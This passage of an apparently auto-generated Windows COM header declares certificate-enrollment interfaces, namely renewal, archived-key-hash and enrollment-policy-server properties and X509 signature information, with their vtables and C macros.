            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificate )( 
            __RPC__in ICertPropertyRenewal * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in ICertPropertyRenewal * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PropertyId )( 
            __RPC__in ICertPropertyRenewal * This,
            /* [retval][out] */ __RPC__out CERTENROLL_PROPERTYID *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_PropertyId )( 
            __RPC__in ICertPropertyRenewal * This,
            /* [in] */ CERTENROLL_PROPERTYID Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in ICertPropertyRenewal * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *RemoveFromCertificate )( 
            __RPC__in ICertPropertyRenewal * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *SetValueOnCertificate )( 
            __RPC__in ICertPropertyRenewal * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in ICertPropertyRenewal * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strRenewalValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificateHash )( 
            __RPC__in ICertPropertyRenewal * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Renewal )( 
            __RPC__in ICertPropertyRenewal * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } ICertPropertyRenewalVtbl;

    interface ICertPropertyRenewal
    {
        CONST_VTBL struct ICertPropertyRenewalVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertPropertyRenewal_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertPropertyRenewal_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertPropertyRenewal_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertPropertyRenewal_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertPropertyRenewal_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertPropertyRenewal_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertPropertyRenewal_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertPropertyRenewal_InitializeFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> InitializeFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertyRenewal_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define ICertPropertyRenewal_get_PropertyId(This,pValue)	\
    ( (This)->lpVtbl -> get_PropertyId(This,pValue) ) 

#define ICertPropertyRenewal_put_PropertyId(This,Value)	\
    ( (This)->lpVtbl -> put_PropertyId(This,Value) ) 

#define ICertPropertyRenewal_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define ICertPropertyRenewal_RemoveFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> RemoveFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertyRenewal_SetValueOnCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> SetValueOnCertificate(This,MachineContext,Encoding,strCertificate) ) 


#define ICertPropertyRenewal_Initialize(This,Encoding,strRenewalValue)	\
    ( (This)->lpVtbl -> Initialize(This,Encoding,strRenewalValue) ) 

#define ICertPropertyRenewal_InitializeFromCertificateHash(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> InitializeFromCertificateHash(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertyRenewal_get_Renewal(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_Renewal(This,Encoding,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertPropertyRenewal_INTERFACE_DEFINED__ */


#ifndef __ICertPropertyArchivedKeyHash_INTERFACE_DEFINED__
#define __ICertPropertyArchivedKeyHash_INTERFACE_DEFINED__

/* interface ICertPropertyArchivedKeyHash */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertPropertyArchivedKeyHash;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab33b-217d-11da-b2a4-000e7bbb2b09")
    ICertPropertyArchivedKeyHash : public ICertProperty
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strArchivedKeyHashValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ArchivedKeyHash( 
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICertPropertyArchivedKeyHashVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertPropertyArchivedKeyHash * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertPropertyArchivedKeyHash * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertPropertyArchivedKeyHash * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertPropertyArchivedKeyHash * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertPropertyArchivedKeyHash * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertPropertyArchivedKeyHash * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertPropertyArchivedKeyHash * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificate )( 
            __RPC__in ICertPropertyArchivedKeyHash * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in ICertPropertyArchivedKeyHash * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PropertyId )( 
            __RPC__in ICertPropertyArchivedKeyHash * This,
            /* [retval][out] */ __RPC__out CERTENROLL_PROPERTYID *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_PropertyId )( 
            __RPC__in ICertPropertyArchivedKeyHash * This,
            /* [in] */ CERTENROLL_PROPERTYID Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in ICertPropertyArchivedKeyHash * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *RemoveFromCertificate )( 
            __RPC__in ICertPropertyArchivedKeyHash * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *SetValueOnCertificate )( 
            __RPC__in ICertPropertyArchivedKeyHash * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in ICertPropertyArchivedKeyHash * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strArchivedKeyHashValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ArchivedKeyHash )( 
            __RPC__in ICertPropertyArchivedKeyHash * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } ICertPropertyArchivedKeyHashVtbl;

    interface ICertPropertyArchivedKeyHash
    {
        CONST_VTBL struct ICertPropertyArchivedKeyHashVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertPropertyArchivedKeyHash_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertPropertyArchivedKeyHash_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertPropertyArchivedKeyHash_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertPropertyArchivedKeyHash_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertPropertyArchivedKeyHash_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertPropertyArchivedKeyHash_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertPropertyArchivedKeyHash_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertPropertyArchivedKeyHash_InitializeFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> InitializeFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertyArchivedKeyHash_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define ICertPropertyArchivedKeyHash_get_PropertyId(This,pValue)	\
    ( (This)->lpVtbl -> get_PropertyId(This,pValue) ) 

#define ICertPropertyArchivedKeyHash_put_PropertyId(This,Value)	\
    ( (This)->lpVtbl -> put_PropertyId(This,Value) ) 

#define ICertPropertyArchivedKeyHash_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define ICertPropertyArchivedKeyHash_RemoveFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> RemoveFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertyArchivedKeyHash_SetValueOnCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> SetValueOnCertificate(This,MachineContext,Encoding,strCertificate) ) 


#define ICertPropertyArchivedKeyHash_Initialize(This,Encoding,strArchivedKeyHashValue)	\
    ( (This)->lpVtbl -> Initialize(This,Encoding,strArchivedKeyHashValue) ) 

#define ICertPropertyArchivedKeyHash_get_ArchivedKeyHash(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_ArchivedKeyHash(This,Encoding,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertPropertyArchivedKeyHash_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certenroll_0000_0061 */
/* [local] */ 

typedef 
enum EnrollmentPolicyServerPropertyFlags
    {
        DefaultNone	= 0,
        DefaultPolicyServer	= 0x1
    } 	EnrollmentPolicyServerPropertyFlags;

typedef 
enum PolicyServerUrlFlags
    {
        PsfNone	= 0,
        PsfLocationGroupPolicy	= 1,
        PsfLocationRegistry	= 2,
        PsfUseClientId	= 4,
        PsfAutoEnrollmentEnabled	= 16,
        PsfAllowUnTrustedCA	= 32
    } 	PolicyServerUrlFlags;



extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0061_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0061_v0_0_s_ifspec;

#ifndef __ICertPropertyEnrollmentPolicyServer_INTERFACE_DEFINED__
#define __ICertPropertyEnrollmentPolicyServer_INTERFACE_DEFINED__

/* interface ICertPropertyEnrollmentPolicyServer */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertPropertyEnrollmentPolicyServer;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab34a-217d-11da-b2a4-000e7bbb2b09")
    ICertPropertyEnrollmentPolicyServer : public ICertProperty
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ EnrollmentPolicyServerPropertyFlags PropertyFlags,
            /* [in] */ X509EnrollmentAuthFlags AuthFlags,
            /* [in] */ X509EnrollmentAuthFlags EnrollmentServerAuthFlags,
            /* [in] */ PolicyServerUrlFlags UrlFlags,
            /* [in] */ __RPC__in BSTR strRequestId,
            /* [in] */ __RPC__in BSTR strUrl,
            /* [in] */ __RPC__in BSTR strId,
            /* [in] */ __RPC__in BSTR strEnrollmentServerUrl) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetPolicyServerUrl( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetPolicyServerId( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetEnrollmentServerUrl( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetRequestIdString( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetPropertyFlags( 
            /* [retval][out] */ __RPC__out EnrollmentPolicyServerPropertyFlags *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetUrlFlags( 
            /* [retval][out] */ __RPC__out PolicyServerUrlFlags *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetAuthentication( 
            /* [retval][out] */ __RPC__out X509EnrollmentAuthFlags *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetEnrollmentServerAuthentication( 
            /* [retval][out] */ __RPC__out X509EnrollmentAuthFlags *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICertPropertyEnrollmentPolicyServerVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertPropertyEnrollmentPolicyServer * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertPropertyEnrollmentPolicyServer * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertPropertyEnrollmentPolicyServer * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertPropertyEnrollmentPolicyServer * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertPropertyEnrollmentPolicyServer * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertPropertyEnrollmentPolicyServer * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertPropertyEnrollmentPolicyServer * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificate )( 
            __RPC__in ICertPropertyEnrollmentPolicyServer * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in ICertPropertyEnrollmentPolicyServer * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PropertyId )( 
            __RPC__in ICertPropertyEnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__out CERTENROLL_PROPERTYID *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_PropertyId )( 
            __RPC__in ICertPropertyEnrollmentPolicyServer * This,
            /* [in] */ CERTENROLL_PROPERTYID Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in ICertPropertyEnrollmentPolicyServer * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *RemoveFromCertificate )( 
            __RPC__in ICertPropertyEnrollmentPolicyServer * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *SetValueOnCertificate )( 
            __RPC__in ICertPropertyEnrollmentPolicyServer * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in ICertPropertyEnrollmentPolicyServer * This,
            /* [in] */ EnrollmentPolicyServerPropertyFlags PropertyFlags,
            /* [in] */ X509EnrollmentAuthFlags AuthFlags,
            /* [in] */ X509EnrollmentAuthFlags EnrollmentServerAuthFlags,
            /* [in] */ PolicyServerUrlFlags UrlFlags,
            /* [in] */ __RPC__in BSTR strRequestId,
            /* [in] */ __RPC__in BSTR strUrl,
            /* [in] */ __RPC__in BSTR strId,
            /* [in] */ __RPC__in BSTR strEnrollmentServerUrl);
        
        HRESULT ( STDMETHODCALLTYPE *GetPolicyServerUrl )( 
            __RPC__in ICertPropertyEnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetPolicyServerId )( 
            __RPC__in ICertPropertyEnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetEnrollmentServerUrl )( 
            __RPC__in ICertPropertyEnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetRequestIdString )( 
            __RPC__in ICertPropertyEnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetPropertyFlags )( 
            __RPC__in ICertPropertyEnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__out EnrollmentPolicyServerPropertyFlags *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetUrlFlags )( 
            __RPC__in ICertPropertyEnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__out PolicyServerUrlFlags *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetAuthentication )( 
            __RPC__in ICertPropertyEnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__out X509EnrollmentAuthFlags *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetEnrollmentServerAuthentication )( 
            __RPC__in ICertPropertyEnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__out X509EnrollmentAuthFlags *pValue);
        
        END_INTERFACE
    } ICertPropertyEnrollmentPolicyServerVtbl;

    interface ICertPropertyEnrollmentPolicyServer
    {
        CONST_VTBL struct ICertPropertyEnrollmentPolicyServerVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertPropertyEnrollmentPolicyServer_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertPropertyEnrollmentPolicyServer_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertPropertyEnrollmentPolicyServer_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertPropertyEnrollmentPolicyServer_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertPropertyEnrollmentPolicyServer_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertPropertyEnrollmentPolicyServer_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertPropertyEnrollmentPolicyServer_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertPropertyEnrollmentPolicyServer_InitializeFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> InitializeFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertyEnrollmentPolicyServer_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define ICertPropertyEnrollmentPolicyServer_get_PropertyId(This,pValue)	\
    ( (This)->lpVtbl -> get_PropertyId(This,pValue) ) 

#define ICertPropertyEnrollmentPolicyServer_put_PropertyId(This,Value)	\
    ( (This)->lpVtbl -> put_PropertyId(This,Value) ) 

#define ICertPropertyEnrollmentPolicyServer_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define ICertPropertyEnrollmentPolicyServer_RemoveFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> RemoveFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertyEnrollmentPolicyServer_SetValueOnCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> SetValueOnCertificate(This,MachineContext,Encoding,strCertificate) ) 


#define ICertPropertyEnrollmentPolicyServer_Initialize(This,PropertyFlags,AuthFlags,EnrollmentServerAuthFlags,UrlFlags,strRequestId,strUrl,strId,strEnrollmentServerUrl)	\
    ( (This)->lpVtbl -> Initialize(This,PropertyFlags,AuthFlags,EnrollmentServerAuthFlags,UrlFlags,strRequestId,strUrl,strId,strEnrollmentServerUrl) ) 

#define ICertPropertyEnrollmentPolicyServer_GetPolicyServerUrl(This,pValue)	\
    ( (This)->lpVtbl -> GetPolicyServerUrl(This,pValue) ) 

#define ICertPropertyEnrollmentPolicyServer_GetPolicyServerId(This,pValue)	\
    ( (This)->lpVtbl -> GetPolicyServerId(This,pValue) ) 

#define ICertPropertyEnrollmentPolicyServer_GetEnrollmentServerUrl(This,pValue)	\
    ( (This)->lpVtbl -> GetEnrollmentServerUrl(This,pValue) ) 

#define ICertPropertyEnrollmentPolicyServer_GetRequestIdString(This,pValue)	\
    ( (This)->lpVtbl -> GetRequestIdString(This,pValue) ) 

#define ICertPropertyEnrollmentPolicyServer_GetPropertyFlags(This,pValue)	\
    ( (This)->lpVtbl -> GetPropertyFlags(This,pValue) ) 

#define ICertPropertyEnrollmentPolicyServer_GetUrlFlags(This,pValue)	\
    ( (This)->lpVtbl -> GetUrlFlags(This,pValue) ) 

#define ICertPropertyEnrollmentPolicyServer_GetAuthentication(This,pValue)	\
    ( (This)->lpVtbl -> GetAuthentication(This,pValue) ) 

#define ICertPropertyEnrollmentPolicyServer_GetEnrollmentServerAuthentication(This,pValue)	\
    ( (This)->lpVtbl -> GetEnrollmentServerAuthentication(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertPropertyEnrollmentPolicyServer_INTERFACE_DEFINED__ */


#ifndef __IX509SignatureInformation_INTERFACE_DEFINED__
#define __IX509SignatureInformation_INTERFACE_DEFINED__

/* interface IX509SignatureInformation */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509SignatureInformation;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab33c-217d-11da-b2a4-000e7bbb2b09")
    IX509SignatureInformation : public IDispatch
    {
    public:
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_HashAlgorithm( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_HashAlgorithm( 
            /* [in] */ __RPC__in_opt IObjectId *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_PublicKeyAlgorithm( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_PublicKeyAlgorithm( 
            /* [in] */ __RPC__in_opt IObjectId *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Parameters( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Parameters( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_AlternateSignatureAlgorithm( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_AlternateSignatureAlgorithm( 
            /* [in] */ VARIANT_BOOL Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_AlternateSignatureAlgorithmSet( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_NullSigned( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_NullSigned( 
            /* [in] */ VARIANT_BOOL Value) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetSignatureAlgorithm( 
            /* [in] */ VARIANT_BOOL Pkcs7Signature,
            /* [in] */ VARIANT_BOOL SignatureKey,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue) = 0;
        
